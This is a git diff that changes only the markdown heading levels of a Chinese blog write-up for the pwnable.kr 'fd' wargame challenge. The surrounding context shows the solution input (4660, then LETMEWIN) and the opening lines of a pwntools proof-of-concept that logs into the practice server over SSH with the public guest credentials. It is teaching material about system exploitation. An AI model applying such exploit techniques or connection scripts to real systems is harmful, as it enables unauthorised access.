--- a/_posts/2019-08-07-Pwnable-01-fd.md
+++ b/_posts/2019-08-07-Pwnable-01-fd.md
@@ -8,11 +8,11 @@ author: author1
 accent_image:          /assets/img/sidebar-bg.jpg
 accent_color:          '#4fb1ba'
 ---
-# pwnable的第一题fd
+### pwnable的第一题fd
 
 
   ['pwnable.kr'](https://pwnable.kr/index.php)is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'.    please consider each of the challenges as a game. while playing pwnable.kr, you could learn/improve system hacking skills but that shouldn't be your only purpose.
-## 源代码：
+#### 源代码：
 
 ```c++
   #include <stdio.h>
@@ -38,7 +38,7 @@ accent_color:          '#4fb1ba'
 
   }
 ```
-## 解题思路
+#### 解题思路
 
 ```
   目标：执行system(“/bin/cat flag”);
@@ -59,13 +59,13 @@ accent_color:          '#4fb1ba'
   fd == 1为标准输出
   fd == 2为标准错误输出
 ```
-## 解答：
+#### 解答：
 
 先输入0x1234的十进制即4660，然后再输入LETMEWIN
 ./fd 4660
 LETMEWIN
 
-## poc
+#### poc
 ```python
   from pwn import *
   pwn_ssh=ssh(host='pwnable.kr',user='fd',password='guest',port=2222)
